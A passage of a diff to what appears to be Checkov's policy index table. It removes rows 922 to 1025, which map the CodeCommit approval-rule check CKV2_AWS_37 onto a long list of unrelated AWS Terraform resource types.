[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 922 | CKV2_AWS_37 | resource | aws_mq_broker | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 923 | CKV2_AWS_37 | resource | aws_mq_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 924 | CKV2_AWS_37 | resource | aws_msk_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 925 | CKV2_AWS_37 | resource | aws_msk_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 926 | CKV2_AWS_37 | resource | aws_nat_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 927 | CKV2_AWS_37 | resource | aws_neptune_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 928 | CKV2_AWS_37 | resource | aws_neptune_cluster_instance | Ensure CodeCommit associates an approval rule | 
Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 929 | CKV2_AWS_37 | resource | aws_neptune_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 930 | CKV2_AWS_37 | resource | aws_neptune_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 931 | CKV2_AWS_37 | resource | aws_neptune_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 932 | CKV2_AWS_37 | resource | aws_neptune_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 933 | CKV2_AWS_37 | resource | aws_neptune_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 934 | CKV2_AWS_37 | resource | aws_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 935 | CKV2_AWS_37 | resource | 
aws_network_acl_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 936 | CKV2_AWS_37 | resource | aws_network_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 937 | CKV2_AWS_37 | resource | aws_network_interface_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 938 | CKV2_AWS_37 | resource | aws_network_interface_sg_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 939 | CKV2_AWS_37 | resource | aws_opsworks_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 940 | CKV2_AWS_37 | resource | aws_opsworks_custom_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 941 | CKV2_AWS_37 | resource | aws_opsworks_ganglia_layer | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 942 | CKV2_AWS_37 | resource | aws_opsworks_haproxy_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 943 | CKV2_AWS_37 | resource | aws_opsworks_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 944 | CKV2_AWS_37 | resource | aws_opsworks_java_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 945 | CKV2_AWS_37 | resource | aws_opsworks_memcached_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 946 | CKV2_AWS_37 | resource | aws_opsworks_mysql_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 947 | CKV2_AWS_37 | resource | aws_opsworks_nodejs_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 948 | CKV2_AWS_37 | resource | aws_opsworks_permission | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 949 | CKV2_AWS_37 | resource | aws_opsworks_php_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 950 | CKV2_AWS_37 | resource | aws_opsworks_rails_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 951 | CKV2_AWS_37 | resource | aws_opsworks_rds_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 952 | CKV2_AWS_37 | resource | aws_opsworks_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 953 | CKV2_AWS_37 | resource | aws_opsworks_static_web_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 954 | CKV2_AWS_37 | resource | aws_opsworks_user_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 955 
| CKV2_AWS_37 | resource | aws_organizations_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 956 | CKV2_AWS_37 | resource | aws_organizations_organization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 957 | CKV2_AWS_37 | resource | aws_organizations_organizational_unit | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 958 | CKV2_AWS_37 | resource | aws_organizations_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 959 | CKV2_AWS_37 | resource | aws_organizations_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 960 | CKV2_AWS_37 | resource | aws_pinpoint_adm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 961 | CKV2_AWS_37 | resource | aws_pinpoint_apns_channel | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 962 | CKV2_AWS_37 | resource | aws_pinpoint_apns_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 963 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 964 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 965 | CKV2_AWS_37 | resource | aws_pinpoint_app | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 966 | CKV2_AWS_37 | resource | aws_pinpoint_baidu_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 967 | CKV2_AWS_37 | resource | aws_pinpoint_email_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 968 | CKV2_AWS_37 | resource | 
aws_pinpoint_event_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 969 | CKV2_AWS_37 | resource | aws_pinpoint_gcm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 970 | CKV2_AWS_37 | resource | aws_pinpoint_sms_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 971 | CKV2_AWS_37 | resource | aws_placement_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 972 | CKV2_AWS_37 | resource | aws_proxy_protocol_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 973 | CKV2_AWS_37 | resource | aws_qldb_ledger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 974 | CKV2_AWS_37 | resource | aws_quicksight_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 
975 | CKV2_AWS_37 | resource | aws_quicksight_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 976 | CKV2_AWS_37 | resource | aws_ram_principal_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 977 | CKV2_AWS_37 | resource | aws_ram_resource_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 978 | CKV2_AWS_37 | resource | aws_ram_resource_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 979 | CKV2_AWS_37 | resource | aws_ram_resource_share_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 980 | CKV2_AWS_37 | resource | aws_rds_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 981 | CKV2_AWS_37 | resource | aws_rds_cluster_endpoint | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 982 | CKV2_AWS_37 | resource | aws_rds_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 983 | CKV2_AWS_37 | resource | aws_rds_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 984 | CKV2_AWS_37 | resource | aws_rds_global_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 985 | CKV2_AWS_37 | resource | aws_redshift_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 986 | CKV2_AWS_37 | resource | aws_redshift_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 987 | CKV2_AWS_37 | resource | aws_redshift_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 988 | CKV2_AWS_37 | resource | aws_redshift_security_group | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 989 | CKV2_AWS_37 | resource | aws_redshift_snapshot_copy_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 990 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 991 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 992 | CKV2_AWS_37 | resource | aws_redshift_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 993 | CKV2_AWS_37 | resource | aws_resourcegroups_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 994 | CKV2_AWS_37 | resource | aws_root | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | 
-| 995 | CKV2_AWS_37 | resource | aws_root_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 996 | CKV2_AWS_37 | resource | aws_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 997 | CKV2_AWS_37 | resource | aws_route53_delegation_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 998 | CKV2_AWS_37 | resource | aws_route53_health_check | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 999 | CKV2_AWS_37 | resource | aws_route53_query_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1000 | CKV2_AWS_37 | resource | aws_route53_record | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1001 | CKV2_AWS_37 | resource | aws_route53_resolver_endpoint | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1002 | CKV2_AWS_37 | resource | aws_route53_resolver_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1003 | CKV2_AWS_37 | resource | aws_route53_resolver_rule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1004 | CKV2_AWS_37 | resource | aws_route53_vpc_association_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1005 | CKV2_AWS_37 | resource | aws_route53_zone | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1006 | CKV2_AWS_37 | resource | aws_route53_zone_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1007 | CKV2_AWS_37 | resource | aws_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1008 | CKV2_AWS_37 | resource | 
aws_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1009 | CKV2_AWS_37 | resource | aws_s3_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1010 | CKV2_AWS_37 | resource | aws_s3_account_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1011 | CKV2_AWS_37 | resource | aws_s3_bucket | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1012 | CKV2_AWS_37 | resource | aws_s3_bucket_analytics_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1013 | CKV2_AWS_37 | resource | aws_s3_bucket_inventory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1014 | CKV2_AWS_37 | resource | aws_s3_bucket_metric | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1015 | CKV2_AWS_37 | resource | aws_s3_bucket_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1016 | CKV2_AWS_37 | resource | aws_s3_bucket_object | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1017 | CKV2_AWS_37 | resource | aws_s3_bucket_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1018 | CKV2_AWS_37 | resource | aws_s3_bucket_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1019 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1020 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1021 | CKV2_AWS_37 | resource | aws_sagemaker_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1022 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1023 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance_lifecycle_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1024 | CKV2_AWS_37 | resource | aws_secretsmanager_secret | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1025 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_rotation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
